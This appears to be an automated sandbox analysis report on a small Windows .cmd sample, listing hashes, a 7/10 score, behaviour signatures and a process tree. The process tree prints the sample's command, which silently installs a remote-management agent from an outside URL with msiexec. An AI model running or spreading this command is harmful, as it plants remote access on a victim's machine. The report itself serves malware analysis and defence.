Analysis

  • max time kernel
    122s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    02-12-2024 17:14

General

  • Target

    .cmd

  • Size

    243B

  • MD5

    c4bf62cf6cc80eac0f69164f01d1f5ee

  • SHA1

    8d2a2748387d76924429b3fd35bca6ae2fca4507

  • SHA256

    eb4e2f8d3d2a735a325c6510ba0f814ca4652dede7b62ee342ec6f0b0c00b04b

  • SHA512

    92f06f6491347827e90eb36b1c424b20e19de1d460d45ac1313b4bdbdabb0aec9ba8983ff0a4a4efdbc34a9bcb52f58c15923ad7fbeda228aa8cef180512d87d

Score
7/10

Malware Config

Signatures

  • Use of msiexec (install) with remote resource 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:684
    • C:\Windows\system32\msiexec.exe
      msiexec /i "https://youreal.servicedesk.atera.com/GetAgent/Msi/?customerId=5&[email protected]&customerName=LL2&accountId=001Q3000003TcZeIAK" /qn [email protected] CompanyId=2 AccountId=001Q300000LYyQnIAL
      2⤵
      • Use of msiexec (install) with remote resource
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      PID:2468
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of AdjustPrivilegeToken
    PID:2616

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads